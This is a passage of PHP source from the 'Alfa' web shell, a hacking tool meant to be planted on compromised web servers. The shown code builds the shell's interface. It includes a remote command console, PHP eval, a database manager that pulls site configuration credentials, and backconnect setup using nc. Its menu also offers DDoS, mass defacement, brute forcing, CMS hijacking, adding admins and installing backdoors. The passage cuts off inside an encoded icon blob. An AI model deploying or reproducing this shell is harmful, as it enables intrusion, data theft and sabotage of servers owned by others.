715. background-size:23px 23px;
716. background-color:#000;
717. width:30px;
718. height:30px;
719. border:1px solid #27979B;
720. border-radius:100px}textarea{padding:3px;
721. color:#999;
722. text-shadow:#777 0 0 3px;
723. border:1px solid #0E304A;
724. background:transparent;
725. box-shadow:0 0 4px #0E304A;
726. padding:3px;
727. -webkit-border-radius:4px;
728. -moz-border-radius:4px;
729. border-radius:4px;
730. -webkit-box-shadow:#555 0 0 4px;
731. -moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;
732. text-shadow:#060 0 0 6px;
733. box-shadow:0 0 4px #27979B;
734. border:1px solid #27979B;
735. padding:3px;
736. -webkit-border-radius:4px;
737. -moz-border-radius:4px;
738. border-radius:4px;
739. -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
740. -moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;
741. color:#999;
742. text-shadow:#777 0 0 3px;
743. border:1px solid #0E304A;
744. background:transparent;
745. box-shadow:0 0 4px #0E304A;
746. padding:3px;
747. -webkit-border-radius:4px;
748. -moz-border-radius:4px;
749. border-radius:4px;
750. -webkit-box-shadow:#555 0 0 4px;
751. -moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;
752. text-shadow:#060 0 0 6px;
753. box-shadow:0 0 4px #27979B;
754. border:2px solid #27979B;
755. -moz-border-radius:4px;
756. border-radius:100px;
757. -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
758. -moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;
759. text-shadow:#060 0 0 6px;
760. box-shadow:0 0 4px #27979B;
761. border:1px solid #27979B;
762. padding:3px;
763. -webkit-border-radius:4px;
764. -moz-border-radius:4px;
765. border-radius:4px;
766. -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
767. -moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;
768. width:162px;
769. color:#FFE;
770. text-shadow:#000 0 2px 7px;
771. border:1px solid #0E304A;
772. background:#000;
773. text-decoration:none;
774. box-shadow:0 0 4px #0E304A;
775. padding:3px;
776. -webkit-border-radius:4px;
777. -moz-border-radius:4px;
778. border-radius:4px;
779. -webkit-box-shadow:#555 0 0 4px;
780. -moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;
781. box-shadow:0 0 4px #27979B;
782. padding:3px;
783. -webkit-border-radius:4px;
784. -moz-border-radius:4px;
785. border-radius:4px;
786. -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
787. -moz-box-shadow:rgba(0,119,0) 0 0 4px}
788. ';
789. echo ".foottable{width: 300px;
790. font-weight: bold;
791. ".(!is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;
792. }':'}');
793. echo '.main th{text-align:left;
794. }
795. .main a{color: #FFF;
796. }
797. .main tr:hover{background-color:#646464;
798. }
799. .ml1{ border:1px solid #0E304A;
800. padding:5px;
801. margin:0;
802. overflow: auto;
803. }
804. .bigarea{ width:99%;
805. height:300px;
806. }
807. </style>
808. ';
809. echo "<script type='text/javascript'>
810. var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
811.  
812. var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
813. var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
814.  
815. var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
816.  
817. var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
818.  
819. var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
820.  
821. var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
822.  
823. var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
824.  
825. var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
826.  
827. var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
828.  
829. var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
830.  
831. var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
832.  
833. var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
834.  
835. var d = document;
836.  
837. var mysql_cache = {};
838.  
839. var upcount = 1;
840.  
841. var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
842.  
843. function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
844. if(a!=null)d.mf.a.value=a;
845. else d.mf.a.value=a_;
846.  
847. if(c!=null)d.mf.c.value=c;
848. else d.mf.c.value=c_;
849. ";
850. for($j=1;
851. $j<=10;
852. $j++){ echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';
853. else d.mf.alfa'.$j.'.value=alfa'.$j.'_;
854. ';
855. } echo "
856. if(charset!=null)d.mf.charset.value=charset;
857. else d.mf.charset.value=charset_;
858.  
859. }";
860. echo 'function fc(a){alfaloader("block");
861. var b="a=RmlsZXNNYW4=&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax=dHJ1ZQ==&",c="";
862. for(i=0;
863. i<d.files.elements.length;
864. i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");
865. _Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";
866. islinux&&(b="<a onclick=\"g(\'FilesMan\',\'/\');
867. \" href=\'javascript:void(0);
868. \'>/</a>",c="/");
869. var e=a.split("/"),f="",g="";
870. "-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));
871. for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');
872. \" href=\'javascript:void(0);
873. \'>"+e[i]+"/</a>",g+=e[i]+"/");
874. $("header_cwd").innerHTML=b+f+" ";
875. var e=c+e.join("/");
876. e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");
877. newElement.innerHTML=html;
878. for(var scripts=newElement.getElementsByTagName("script"),i=0;
879. i<scripts.length;
880. ++i){var script=scripts[i];
881. eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;
882. return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";
883. 0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");
884. var b=!1;
885. if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");
886. b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";
887. c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a=RmlsZXNNYW4=&c="+a.c.value+"&ajax=dHJ1ZQ=="),c.style.display="none",a.a.value=atob(a.a.value),a.c.value=atob(a.c.value),a.alfa1.value=atob(a.alfa1.value),a.charset.value=atob(a.charset.value)):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";
888. upcount;
889. ){var f=$("pfooterup_"+upcount);
890. f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none")},b.onerror=function(a){};
891. var e=new FormData(a);
892. b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);
893. for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;
894. i<=10;
895. i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";
896. if(data+="&ajax=dHJ1ZQ==","FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");
897. return dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfab64(a){return window.btoa(unescape(encodeURIComponent(a)))}function alfaloader(a){$("a_loader").style.display=a}function execute(){var a=d.cf.cmd;
898. if(""!=a.value){var b=d.cf.output;
899. if("clear"==a.value||"cls"==a.value||"reset"==a.value)return b.value="",a.value="",!1;
900. if(a.value.match(/color/i)){var c=a.value.split(" ");
901. return""!=c[1]&&(b.style.color=c[1],a.value=""),!1}alfaloader("block"),b.value+="\\n> "+a.value+"\\n",_Ajax(d.URL,"a=Y29uc29sZQ==&cmd="+alfab64(a.value),function(a){d.cf.output.value+=a,d.cf.output.scrollTop=d.cf.output.scrollHeight,alfaloader("none")}),a.value=""}}function fsu(a){alfaloader("block");
902. for(var b={},c=0;
903. c<a.elements.length;
904. c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);
905. for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);
906. _Ajax(d.URL,"a=U3Fs&alfa1=dXBkYXRl&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax=dHJ1ZQ==",function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");
907. var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";
908. switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);
909. break;
910. case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);
911. break;
912. case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));
913. break;
914. case"3":alfa1="loadfile",alfa2=alfab64(e);
915. break;
916. case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");
917. var obj={},id=$("dumpfile");
918. for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;
919. i<d.sf.elements["tbl[]"].length;
920. ++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);
921. alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a=U3Fs&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax=dHJ1ZQ==",function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");
922. "bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;
923. i<d.sf.elements["tbl[]"].length;
924. ++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");
925. e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;
926. &nbsp;
927. Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');
928. ">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");
929. break;
930. case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");
931. break;
932. case"direct":bruteSet(!1,"2222","http://");
933. break;
934. case"cp":bruteSet(!1,"2082","http://");
935. break;
936. case"ftp":bruteSet(!0,"Disabled","ftp://");
937. break;
938. case"mysql":bruteSet(!1,"3306","http://");
939. break;
940. case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};
941. function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";
942. }else{$("backdoor_textarea").style.display="none";
943. }}';
944. echo "</script>
945. <form style='display:none;
946. ' id='dlForm' action='' target='_blank' method='post'>
947. <input type='hidden' name='a' value='ZGxmaWxl'>
948. <input type='hidden' name='c' value=''>
949. <input type='hidden' name='file' value=''>
950. </form>
951. <img id='a_loader' src='".__showicon('loader')."'>";
952. $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : '( php_uname ) Function Disabled !';
953. echo '
954. </head>
955. <body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
956. <div id="up_bar"></div>
957. <div class="whole">
958. <form method="post" name="mf" style="display:none;
959. ">
960. <input type="hidden" name="a">
961. <input type="hidden" name="c">';
962. for($s=1;
963. $s<=10;
964. $s++){ echo '<input type="hidden" name="alfa'.$s.'">';
965. } echo '<input type="hidden" name="charset">
966. </form>
967. <div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: 2.5</small></a></div>
968. <div class="header"><table width="100%" border="0">
969. <tr>
970. <td width="3%"><span><font color=#27979B>Uname:</font></span></td>
971. <td colspan="2"><b>'.$uname.'</b></td>
972. </tr>
973. <tr>
974. <td><span><font color=#27979B>User:</font></span></td>
975. <td><b>'. $uid . ' [ ' . $user . ' ] </b><span> <font color=#27979B> Group: </font></span><b>' . $gid . ' [ ' . $group . ' ]</b> </td>
976. <td width="12%" rowspan="8"><img style="border-radius:100px;
977. " width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
978. </tr>
979. <tr>
980. <td><span><font color=#27979B>PHP:</font></span></td>
981. <td><b>'.@phpversion(). ' </b><span> <font color=#27979B> Safe Mode: </font>'.$safe_modes.'</span></td>
982. </tr>
983. <tr>
984. <td><span><font color=#27979B>ServerIP:</font></span></td>
985. <td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span><font color=#27979B>Your IP:</font></span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
986. </tr>
987. <tr>
988. <td width="3%"><span><font color=#27979B>DateTime:</font></span></td>
989. <td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
990. </tr>
991. <tr>
992. <td><span><font color=#27979B>Domains:</font></span></td>
993. <td width="76%"><b>';
994. if($GLOBALS['sys']=='unix'){ $d0mains = @file("/etc/named.conf");
995. if(!$d0mains){echo "CANT READ named.conf";
996. }else{ $count;
997. foreach($d0mains as $d0main){ if(@ereg("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains);
998. flush();
999. if(strlen(trim($domains[1][0])) > 2){ flush();
1000. $count++;
1001. } } } echo "$count Domains";
1002. } } else{ echo"CANT READ |Windows|";
1003. } echo '</b></td>
1004. </tr>
1005. <tr>
1006. <td height="16"><span><font color=#27979B>HDD:<font></span></td>
1007. <td><span><font color=#27979B>Total:</font></span><b>'.alfaSize($totalSpace).' </b><span><font color=#27979B>Free:</font></span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
1008. </tr>';
1009. if($GLOBALS['sys']=='unix' ) { if(!@ini_get('safe_mode')) { if(strlen(alfaEx("id"))>0){ echo '<tr><td height="18" colspan="2"><span><font color=#27979B>Useful : </font></span><b>';
1010. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
1011. foreach($userful as $item) if(alfaWhich($item)) echo $item.',';
1012. echo '</b></td>
1013. </tr>
1014. <tr>
1015. <td height="0" colspan="2"><span><font color=#27979B>Downloader:</font></span>';
1016. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1017. foreach($downloaders as $item2) if(alfaWhich($item2)) echo '<b>'.$item2.',';
1018. echo '</b></td>
1019. </tr>';
1020. }else{ echo '<tr><td height="18" colspan="2"><span><font color=#27979B>useful:<font></span>';
1021. echo '--------------</td>
1022. </tr><td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span>-------------</td>
1023. </tr>';
1024. } } else { echo '<tr><td height="18" colspan="2"><span><font color=#27979B>useful:<font></span>';
1025. echo '--------------</td>
1026. </tr><td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span>-------------</td>
1027. </tr>';
1028. } } else { echo '<tr><td height="18" colspan="2"><span><font color=#27979B>Windows:</font></span><b>';
1029. echo alfaEx('ver');
1030. echo '</td>
1031. </tr> <tr>
1032. <td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span><b>-------------</b></td>
1033. </tr></b>';
1034. } $quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');
1035. if ($quotes == "1" or $quotes == "on"){$magic = '<b><font color="#0F0">ON</font>';
1036. }else{$magic = '<b><font color="red">OFF</font>';
1037. } echo '<tr>
1038. <td height="16" colspan="2"><span><font color=#27979B>Disabled Functions: </font></span><b>'.Alfa_GetDisable_Function().'</b></td>
1039. </tr>
1040. <tr>
1041. <td height="16" colspan="2"><span><font color=#27979B>CURL :</font><b>'.$curl.' </b> | <font color=#27979B>SSH2 : </font><b>'.$ssh2.' </b> | <font color=#27979B>Magic Quotes : </font><b>'.$magic.' </b> | <font color=#27979B> MySQL :</font><b>'.$mysql.' </b> | <font color=#27979B>MSSQL :</font><b>'.$mssql.' </b> | <font color=#27979B> PostgreSQL :</font><b>'.$pg.'</b> | <font color=#27979B> Oracle :</font> </span><b>'.$or.'</b></td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
1042. </tr>
1043. <tr>
1044. <td height="11" colspan="3"><span><font color=#27979B>Open_basedir :<b>'.$open_b.'</b></font> | <font color=#27979B>Safe_mode_exec_dir :</b>'.$safe_exe.'</b></font> | <font color=#27979B> Safe_mode_include_dir :</b>'.$safe_include.'</b></font></td>
1045. </tr>
1046. <tr>
1047. <td height="11"><span><font color=#27979B>SoftWare:<font color=#27979B> </span></td>
1048. <td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
1049. </tr>';
1050. if($GLOBALS[sys]=="win") { echo '<tr>
1051. <td height="12"><span><font color=#27979B>DRIVE:</font></span></td>
1052. <td colspan="2"><b>'.$drives.'</b></td>
1053. </tr>';
1054. } echo '<tr>
1055. <td height="12"><span><font color=#27979B>PWD:</font></span></td>
1056. <td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);
1057. " onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color=red >| Home Shell |</font></a></td>
1058. </tr>
1059. </table>
1060. </div>
1061. <div id="meunlist">
1062. <ul>
1063. ';
1064. $li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2', 'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','cmd'=>'CONSOLE','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools', 'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors', 'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher', 'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<font color="#27E8AE">Alfa +</font>','selfrm'=>'Remove Shell' );
1065. foreach($li as $key=>$value){ echo('<li><a href="javascript:void(0);
1066. " onclick="g(\''.$key.'\',null,\'\',\'\',\'\');
1067. "><font color="#27979B">'.$value.'</font></a></li>'."\n");
1068. } if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass'])) echo '<li><a href="javascript:void(0);
1069. " onclick="g(\'logout\',null,\'\',\'\',\'\');
1070. location.reload();
1071. "><font color="red">LogOut</font></a></li></ul></div>';
1072. else echo '</ul></div>';
1073. }else{ @error_reporting(E_ALL ^ E_NOTICE);
1074. @session_start();
1075. @ini_set('error_log',NULL);
1076. @ini_set('log_errors',0);
1077. @ini_set('max_execution_time',0);
1078. @ini_set('magic_quotes_runtime', 0);
1079. @set_time_limit(0);
1080. }} function alfalogout(){ unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
1081. @header('location: '.$_SERVER['PHP_SELF']);
1082. } function __showicon($r){ $s['btn']='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